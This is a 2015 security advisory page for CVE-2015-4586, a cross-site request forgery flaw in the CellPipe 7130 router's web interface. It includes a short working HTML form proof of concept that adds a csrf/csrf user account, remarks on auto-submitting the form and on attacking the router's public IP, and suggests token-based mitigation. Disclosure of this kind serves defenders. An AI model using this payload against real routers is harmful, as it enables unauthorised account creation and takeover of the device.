what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

CellPipe 7130 Cross Site Request Forgery

CellPipe 7130 Cross Site Request Forgery
Posted Jun 16, 2015
Authored by Dionisia Lerataki

CellPipe 7130 router version 1.0.0.20h.HOL suffers from a cross site request forgery vulnerability.

tags | exploit, csrf
advisories | CVE-2015-4586
SHA-256 | b4208c80088ecfa773353853c2cf70171df70a35ad267695d22e5afeee28d344

CellPipe 7130 Cross Site Request Forgery

Change Mirror Download
CellPipe Router CSRF vulnerability

Device model : CellPipe 7130 RG 5Ae. M2013 HOL
*Software Version:* : *1.0.0.20h.HOL*
CWE: 352 - https://cwe.mitre.org/data/definitions/352.html
CVE: CVE-2015-4586
Date: 16/06/2015
Discovered by: DiLi


Vulnerability type: Multiple CSRF vulnerabilities in the router's web
interface

CSRF (Cross Site Request Forgery) is an attack which forces an end user to
execute unwanted actions on a web application in which he/she is currently
authenticated. It is currently included in the OWASP Top 10 project.

Exploitation and Impact:

The exploitation of the above vulnerabilities, in addition with a social
engineering
attack, may lead to :

• Unwanted service exposure
• DNS Hijacking
• Disabling wireless security
• User account creation

I have tested the scenario with the user account creation and the proof of
concept is the following:

<html>
<body>
<form action="http://192.168.1.1/password.cmd
<http://192.168.2.1/password.cmd>">
<input type="hidden" name="action" value="add_user" />
<input type="hidden" name="userAdd" value="csrf" />
<input type="hidden" name="pwdAdd" value="csrf" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>

If a router administrator executes the above code a user with credentials
(csrf/csrf) will be added.
In our PoC the administrator must press the Submit request but in a real
attack scenario an attacker can implement an auto submit javascript code.

In our case the router IP address is: 192.168.1.1. Of course it can be
exploited with the router's public IP address.

Suggested mitigation:

In order to properly patch the CSRF vulnerability the following measures
have to be
taken:

• Add a randomly generated token associated with the user's session in order
to prevent a CSRF attack. Alternatively a check to the referer header can be
introduced. Although referer headers can be easily spoofed, they can
prevent a CSRF attack of this kind.
Login or Register to add favorites

File Archive:

February 2023

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Feb 1st
    11 Files
  • 2
    Feb 2nd
    9 Files
  • 3
    Feb 3rd
    0 Files
  • 4
    Feb 4th
    0 Files
  • 5
    Feb 5th
    0 Files
  • 6
    Feb 6th
    0 Files
  • 7
    Feb 7th
    0 Files
  • 8
    Feb 8th
    0 Files
  • 9
    Feb 9th
    0 Files
  • 10
    Feb 10th
    0 Files
  • 11
    Feb 11th
    0 Files
  • 12
    Feb 12th
    0 Files
  • 13
    Feb 13th
    0 Files
  • 14
    Feb 14th
    0 Files
  • 15
    Feb 15th
    0 Files
  • 16
    Feb 16th
    0 Files
  • 17
    Feb 17th
    0 Files
  • 18
    Feb 18th
    0 Files
  • 19
    Feb 19th
    0 Files
  • 20
    Feb 20th
    0 Files
  • 21
    Feb 21st
    0 Files
  • 22
    Feb 22nd
    0 Files
  • 23
    Feb 23rd
    0 Files
  • 24
    Feb 24th
    0 Files
  • 25
    Feb 25th
    0 Files
  • 26
    Feb 26th
    0 Files
  • 27
    Feb 27th
    0 Files
  • 28
    Feb 28th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Hosting By
Rokasec
close